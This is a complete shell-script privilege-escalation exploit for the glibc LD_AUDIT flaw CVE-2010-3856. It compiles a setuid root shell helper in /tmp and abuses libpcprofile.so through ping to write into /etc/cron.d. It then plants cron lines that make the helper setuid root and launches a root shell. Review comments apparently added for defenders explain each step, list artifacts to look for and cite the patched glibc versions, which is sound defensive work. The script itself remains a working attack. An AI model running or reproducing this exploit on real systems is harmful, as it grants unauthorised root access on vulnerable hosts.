#!/bin/sh
#
# $Id: raptor_ldaudit,v 1.2 2011/02/04 11:05:15 raptor Exp $
#
# raptor_ldaudit - privilege escalation through glibc ld.so
# Copyright (c) 2010 Marco Ivaldi
#
# Property of @ Mediaservice.net Srl Data Security Division
# http://www.mediaservice.net/ http://lab.mediaservice.net/
#
# ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x
# before 2.12.2, does not properly restrict use of the LD_AUDIT environment
# variable to reference dynamic shared objects (DSOs) as audit objects, which
# allows local users to gain privileges by leveraging an unsafe DSO located in
# a trusted library directory, as demonstrated by libpcprofile.so
# (CVE-2010-3856).
#
# "Suit up. Score chicks. Be awesome." -- Barney Stinson
#
# This vulnerability has been disclosed by Tavis Ormandy (with thanks to Ben
# Hawkes and Julien Tinnes): http://seclists.org/fulldisclosure/2010/Oct/344
#
# Other possible attack vectors: /etc/cron.{hourly,daily,weekly,monthly}, at
# (/var/spool/atjobs/), xinetd (/etc/xinetd.d), /etc/logrotate.d and more...
#
# Usage:
# $ chmod +x raptor_ldaudit
# $ ./raptor_ldaudit
# [...]
# Everything looks fine. Just wait for it... LEGEN-DARY!
# -rwsr-xr-x 1 root users 5707 2010-11-11 14:48 /tmp/pwned
# sh-4.1# id
# uid=0(root) gid=0(root) groups=0(root),100(users)
# sh-4.1#
# [don't forget to delete /tmp/pwned*!]
#
# Vulnerable platforms:
# Slackware 13.1 [tested, weird loop in dillon's cron but it works]
# openSUSE 11.3 [untested]
# Fedora Core 13 [untested]
# RHEL/CentOS 5 [untested]
# Ubuntu 10 [untested]
# [...]
#
# NOTE(review): defensive reading of this proof of concept, for people who
# have to recognise it on a host or decide whether a system is exposed.
#
# What it does, step by step (all visible below):
#   1. writes a tiny C program to /tmp/pwned.c and compiles it to /tmp/pwned;
#      the program calls setuid(0)/setgid(0) and then system("/bin/sh");
#   2. sets umask 0 and runs `ping` with LD_AUDIT=libpcprofile.so and
#      PCPROFILE_OUTPUT=/etc/cron.d/runme, so the audit DSO loaded into that
#      process writes its profiling output to a path under /etc/cron.d;
#   3. checks that /etc/cron.d/runme now has content, otherwise gives up;
#   4. overwrites /etc/cron.d/runme with crontab lines (one in vixie-cron
#      format with a user field, one in dillon-cron format without) that
#      chown/chmod 4755 /tmp/pwned and delete the cron file;
#   5. sleeps 70 seconds so at least one every-minute cron tick passes, then
#      executes /tmp/pwned.
#
# Artifacts a responder should look for:
#   - /tmp/pwned.c and a setuid-root /tmp/pwned (the usage banner above shows
#     the expected `ls -l` output);
#   - /etc/cron.d/runme, possibly already removed by the cron job itself;
#   - a setuid binary (`ping` here; presumably chosen because it is
#     setuid-root on the tested platforms -- confirm per distribution)
#     started with LD_AUDIT in its environment;
#   - gcc being invoked on sources under /tmp by an unprivileged user.
#
# Mitigation stated by the header: glibc 2.11.3 / 2.12.2 or later restricts
# LD_AUDIT for setuid programs. Whether a given host is exposed also depends
# on libpcprofile.so being present and on which cron implementation parses
# /etc/cron.d -- the header lists only Slackware 13.1 as actually tested.
#
echo "raptor_ldaudit - privilege escalation through glibc ld.so"
echo "Copyright (c) 2010 Marco Ivaldi "
echo

# prepare setuid shell helper to circumvent bash checks
# NOTE(review): the helper is written without any #include lines; whether
# gcc accepts that depends on the compiler version in use -- the `if` below
# only reports the failure.
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc -o /tmp/pwned /tmp/pwned.c
if [ $? -ne 0 ]; then
	echo "Error: Problems compiling setuid shell helper, check your gcc."
	exit 1
fi

# do the magic!
# NOTE(review): $runme is the file the audit DSO is made to write. umask 0 is
# set first, presumably so that the file created by the privileged process
# remains writable by the invoking user for the overwrite further down --
# confirm against the DSO's open() flags if this matters for detection.
runme="/etc/cron.d/runme"
umask 0
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$runme" ping 2>/dev/null
# The only success test is "did the file get any content"; an empty or
# unreadable file is reported as "Not vulnerable or wrong attack vector".
if [ "`cat $runme 2>/dev/null`" = "" ]; then
	echo "Error: Not vulnerable or wrong attack vector? See comments."
	exit 1
fi

# build the cron script (vixie's crontab)
# NOTE(review): `echo -n` is not specified by POSIX for /bin/sh; its effect
# depends on which shell /bin/sh is. Here it is only used to truncate $runme.
echo -n > $runme
echo "* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme

# build the cron script (dillon's crontab)
# Same job without the user field; both lines are appended to the same file,
# each cron flavour is expected to accept the line written for it.
echo "* * * * * chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme

# legen -- wait for it -- dary!
# The crontab lines fire every minute; 70 seconds guarantees one tick passes.
echo -n "Everything looks fine. Just wait for it... "
sleep 70
echo "LEGEN-DARY!"
ls -l /tmp/pwned
/tmp/pwned